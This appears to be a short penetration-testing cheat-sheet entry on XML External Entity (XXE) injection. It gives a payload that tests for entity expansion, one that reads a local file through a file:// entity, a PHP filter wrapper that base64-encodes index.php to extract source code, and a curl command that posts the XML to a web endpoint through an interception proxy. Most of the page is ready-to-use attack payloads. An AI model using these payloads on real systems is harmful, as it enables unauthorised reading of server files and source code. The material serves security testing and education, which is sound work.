XXE

XML External Entity

XXE can be used to access local files on the host, potential RFI for internal hosts, and RCE in very specific circumstances. By creating custom XML elements, we can create specific entities for us to use.

Determine if XXE is triggered:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

This is for LFI:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

Sometimes PHP or Apache will prevent a php file from being loaded. If this is the case, we can actually have PHP encode the file as Base64 to bypass some controls.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>

We can easily submit the xml file to the endpoint using curl's @ feature for files. This also proxies the connection through an interception proxy to let us peek into the response on the tool.

curl --proxy 127.0.0.1:8082 -k -d@./test.xml http://m4lwhere.org/post.php

Last updated